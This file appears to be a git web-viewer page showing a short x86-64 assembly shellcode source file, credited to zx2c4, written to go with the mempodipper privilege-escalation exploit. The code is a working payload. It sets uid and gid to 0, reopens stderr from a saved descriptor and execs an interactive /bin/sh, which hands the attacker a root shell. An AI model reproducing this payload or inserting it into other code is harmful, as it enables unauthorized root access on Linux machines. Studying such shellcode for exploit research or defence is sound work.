aboutsummaryrefslogtreecommitdiffstats
path: root/shellcode-64.s
blob: 517b617a2e1f297bde4e9279c049f48f7e6a0a6f (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
BITS 64
; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
;
; by zx2c4


;setuid(0)
xor rdi,rdi
mov al,0x69
syscall
;setgid(0)
xor rdi,rdi
mov al,0x6a
syscall
;dup2(6, 2)
xor rsi,rsi
mov dil,0x6
mov sil,0x2
mov al,0x21
syscall

; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)
mov qword rbx,'//bin/sh'	; rbx = //bin/sh
shr rbx,0x8			; remove leading / from rbx
push rbx			; push rbx to stack
mov rdi,rsp			; set rdi (arg 1) to top of stack

xor rbx,rbx			; rbx = 0
mov bx,'-i'			; rbx = '-i'
push rbx			; push rbx to stack
mov rcx,rsp			; set rcx to top of stack

xor rax,rax			; rax = 0

; so at this point:
;	rdi is a pointer to '/bin/sh'
;	rcx is a pointer to '-i'
;	rax is null
; since they are all the same size, we'll push them on the stack
; and then it will be an array:
push rax			; push rax to stack
push rcx			; push rcx to stack
push rdi			; push rdi to stack
mov rsi,rsp			; set rsi (arg 2) to top of stack

xor rdx,rdx			; rdx (arg 3) = 0

mov al,0x3b			; al = 0x3b, which is the exec call
syscall